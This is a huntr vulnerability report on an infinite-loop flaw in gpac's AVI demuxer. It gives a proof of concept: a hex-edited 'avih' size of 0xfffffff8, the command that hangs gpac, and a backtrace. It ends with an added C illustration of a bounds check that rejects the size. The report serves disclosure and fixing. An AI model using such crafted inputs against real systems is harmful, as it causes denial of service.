huntr / tianstcht / F8CB85B8-7FF3-47F1-A9A6-7080EB371A3D
History: Mar 29, 2022 - 10:15 a.m.

Inf loop

2022-03-29 10:15:44
tianstcht
www.huntr.dev
10

EPSS: 0.001 (Low)
Percentile: 41.9%

Description

An infinite loop security issue in gpac/gpac.

Proof of Concept

The issue occurs in src/media_tools/avilib.c#L1974 when the gpac avidmx filter parses an AVI file.

Take a simple AVI file; its header, as shown by xxd, is as follows:

$ xxd ./1.avi | head -n 2
00000000: 5249 4646 e81b 0100 4156 4920 4c49 5354  RIFF....AVI LIST
00000010: c222 0000 6864 726c 6176 6968 3800 0000  ."..hdrlavih8...

Use vim in xxd mode to change the header's size field to 0xfffffff8 (-8 when read as a signed 32-bit value); the modified data is as follows:

$ xxd ./1.avi| head -n 2
00000000: 5249 4646 e81b 0100 4156 4920 4c49 5354  RIFF....AVI LIST
00000010: c222 0000 6864 726c 6176 6968 f8ff ffff  ."..hdrlavih....

Then run the following command with the avidmx filter; you will observe an infinite loop:

./gpac -i ./1.avi -o 123 avidmx

Its stack backtrace is as follows:

#0  __strncasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:166
#1  0x00007ffff7a5c62c in avi_parse_input_file.part () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#2  0x00007ffff7a5e9f7 in AVI_open_input_file () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#3  0x00007ffff7bf11d9 in avidmx_process () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#4  0x00007ffff7baced0 in gf_filter_process_task () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#5  0x00007ffff7b9abc4 in gf_fs_thread_proc () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#6  0x00007ffff7b9fb2b in gf_fs_run () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#7  0x0000555555564a5a in gpac_main ()
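The check this report calls for, written in C as an added illustration (this is not gpac's code; the chunk walker, the constructed 88-byte RIFF/AVI header and check_sample are assumptions): the chunk size is kept unsigned and compared against the bytes remaining in the buffer, so the 0xfffffff8 avih size from the PoC is rejected before the parsing loop can stall.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
enum { AVI_ERR_TRUNCATED = -1, AVI_ERR_BAD_SIZE = -2 };   /* negative return codes */
static uint32_t rd_le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr_le32(unsigned char *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (unsigned char)(v >> (8 * i));
}
/* Walk the RIFF chunks in buf[pos, end), descending into RIFF/LIST containers.
 * Returns the number of chunks seen, or a negative AVI_ERR_* code. */
static int walk_chunks(const unsigned char *buf, size_t pos, size_t end) {
    int count = 0;
    while (pos < end) {
        if (end - pos < 8) return AVI_ERR_TRUNCATED;   /* need fourcc + size */
        const unsigned char *id = buf + pos;
        uint32_t size = rd_le32(buf + pos + 4);
        size_t body = pos + 8;
        /* The size is unsigned and must fit in what remains of the buffer: 0xfffffff8
         * is rejected here instead of being read as -8 and leaving pos unable to advance. */
        if (size > end - body) return AVI_ERR_BAD_SIZE;
        count++;
        if (!memcmp(id, "RIFF", 4) || !memcmp(id, "LIST", 4)) {
            if (size < 4) return AVI_ERR_BAD_SIZE;     /* room for the form/list type */
            int sub = walk_chunks(buf, body + 4, body + size);  /* end shrinks, so recursion is bounded */
            if (sub < 0) return sub;
            count += sub;
        }
        pos = body + size + (size & 1);                /* bodies are padded to even length */
    }
    return count;
}
#define AVIH_LEN 56                                    /* 0x38, as in the unmodified file */
#define SAMPLE_LEN (8 + 4 + 8 + 4 + 8 + AVIH_LEN)      /* RIFF/AVI > LIST/hdrl > avih: 88 bytes */
/* Constructed minimal AVI header (assumption); avih_size is the 'avih' size field under test. */
static size_t build_sample(unsigned char *out, uint32_t avih_size) {
    memset(out, 0, SAMPLE_LEN);
    memcpy(out, "RIFF", 4);      wr_le32(out + 4, SAMPLE_LEN - 8);     memcpy(out + 8, "AVI ", 4);
    memcpy(out + 12, "LIST", 4); wr_le32(out + 16, 4 + 8 + AVIH_LEN); memcpy(out + 20, "hdrl", 4);
    memcpy(out + 24, "avih", 4); wr_le32(out + 28, avih_size);
    return SAMPLE_LEN;
}
/* Returns the chunk count (3) for the benign header, AVI_ERR_BAD_SIZE for the PoC size. */
int check_sample(int poisoned) {
    unsigned char buf[SAMPLE_LEN];
    size_t n = build_sample(buf, poisoned ? 0xfffffff8u : AVIH_LEN);
    if (n < 12 || memcmp(buf, "RIFF", 4) || memcmp(buf + 8, "AVI ", 4)) return AVI_ERR_BAD_SIZE;
    return walk_chunks(buf, 0, n);
}
```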
